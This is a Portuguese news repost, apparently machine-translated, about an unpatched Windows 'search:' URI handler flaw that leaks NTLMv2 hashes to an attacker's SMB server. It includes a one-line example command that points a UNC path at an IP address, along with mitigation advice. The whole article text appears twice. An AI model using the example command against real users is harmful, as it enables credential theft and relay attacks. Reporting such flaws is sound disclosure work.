🌟 Atualização imperdível para quem gosta de estar bem informado!
Leia, comente e fique sempre atualizado!
Apoie esse projeto de divulgacao de noticias! Clique aqui
Pesquisadores de segurança cibernética divulgaram detalhes de um problema não corrigido que poderia ser explorado para divulgar o hash NTLMv2 de um usuário ao invasor.
Como no caso de CVE-2026-33829, que impactou o ms-screensketch: manipulador de URI da ferramenta de recorte do Windows, o problema recém-sinalizado reside na pesquisa: manipulador de URI, por Huntress.
CVE-2026-33829 refere-se a uma vulnerabilidade de falsificação que pode expor informações confidenciais a um ator não autorizado. Foi corrigido pela Microsoft em abril de 2026.
“Um invasor pode induzir o usuário a clicar em um link especialmente criado em um navegador da Web ou outra fonte de URL, incorporando-o a uma página da Web ou mensagem de e-mail”, observou a Microsoft em seu comunicado na época.
“Se o usuário aprovar o lançamento do link, a URL criada pode induzir o computador a se conectar a um servidor SMB de escolha do invasor, o que divulgaria o hash NTLMv2 do usuário ao invasor, que poderia usá-lo para se autenticar como usuário.”
Especificamente, o problema tinha a ver com o fato de que o manipulador de URI da Ferramenta de Recorte aceitou um parâmetro “filePath”, falhou ao validá-lo e alcançaria qualquer caminho da Convenção de Nomenclatura Universal (UNC) passado para ele. Isso, por sua vez, poderia acionar a autenticação NTLM e expor o hash Net-NTLMv2 da vítima ao invasor.
A falha recém-descoberta atinge o mesmo objetivo final usando "search:" e "crumb=location:" em vez de "filePath" usando um comando como abaixo -
iniciar "" "search:query=test&crumb=location:\\10.0.1.100\share"
“Ele usou o mesmo mecanismo de vazamento NTLM, produziu o mesmo vazamento Net-NTLMv2, tinha os mesmos pré-requisitos e carregava a mesma classificação Moderada”, disse o pesquisador da Huntress, Andrew Schwartz. É importante notar que o uso de um parâmetro “migalha” para roubar o hash (CVE-2023-35636) foi documentado por Varonis em fevereiro de 2024.
Como resultado, um agente de ameaça poderia aproveitar o hash capturado para conduzir ataques de retransmissão e obter acesso mais profundo a uma rede. Após a divulgação responsável em 15 de abril de 2026, a Microsoft se recusou a abordar o problema, afirmando que “apenas casos de gravidade importantes e críticos atendem aos nossos padrões de manutenção”.
Na ausência de uma correção, é aconselhável bloquear o SMB de saída (TCP/445 e TCP/139) em hosts que não precisam dele, impor a assinatura SMB para que os hashes capturados não possam ser retransmitidos contra serviços internos e desabilitar o NTLM quando aplicável.
Como no caso de CVE-2026-33829, que impactou o ms-screensketch: manipulador de URI da ferramenta de recorte do Windows, o problema recém-sinalizado reside na pesquisa: manipulador de URI, por Huntress.
CVE-2026-33829 refere-se a uma vulnerabilidade de falsificação que pode expor informações confidenciais a um ator não autorizado. Foi corrigido pela Microsoft em abril de 2026.
“Um invasor pode induzir o usuário a clicar em um link especialmente criado em um navegador da Web ou outra fonte de URL, incorporando-o a uma página da Web ou mensagem de e-mail”, observou a Microsoft em seu comunicado na época.
“Se o usuário aprovar o lançamento do link, a URL criada pode induzir o computador a se conectar a um servidor SMB de escolha do invasor, o que divulgaria o hash NTLMv2 do usuário ao invasor, que poderia usá-lo para se autenticar como usuário.”
Especificamente, o problema tinha a ver com o fato de que o manipulador de URI da Ferramenta de Recorte aceitou um parâmetro “filePath”, falhou ao validá-lo e alcançaria qualquer caminho da Convenção de Nomenclatura Universal (UNC) passado para ele. Isso, por sua vez, poderia acionar a autenticação NTLM e expor o hash Net-NTLMv2 da vítima ao invasor.
A falha recém-descoberta atinge o mesmo objetivo final usando "search:" e "crumb=location:" em vez de "filePath" usando um comando como abaixo -
iniciar "" "search:query=test&crumb=location:\\10.0.1.100\share"
“Ele usou o mesmo mecanismo de vazamento NTLM, produziu o mesmo vazamento Net-NTLMv2, tinha os mesmos pré-requisitos e carregava a mesma classificação Moderada”, disse o pesquisador da Huntress, Andrew Schwartz. É importante notar que o uso de um parâmetro “migalha” para roubar o hash (CVE-2023-35636) foi documentado por Varonis em fevereiro de 2024.
Como resultado, um agente de ameaça poderia aproveitar o hash capturado para conduzir ataques de retransmissão e obter acesso mais profundo a uma rede. Após a divulgação responsável em 15 de abril de 2026, a Microsoft se recusou a abordar o problema, afirmando que “apenas casos de gravidade importantes e críticos atendem aos nossos padrões de manutenção”.
Na ausência de uma correção, é aconselhável bloquear o SMB de saída (TCP/445 e TCP/139) em hosts que não precisam dele, impor a assinatura SMB para que os hashes capturados não possam ser retransmitidos contra serviços internos e desabilitar o NTLM quando aplicável.
Fonte: https://thehackernews.com
#samirnews #samir #news #boletimtec #vulnerabilidade #de #uri #de #pesquisa #do #windows #não #corrigida #permite #que #invasores #roubem #hashes #ntlmv2
⚡ Fique ligado: novidades e promoções em breve por aqui! ⚡
Postar um comentário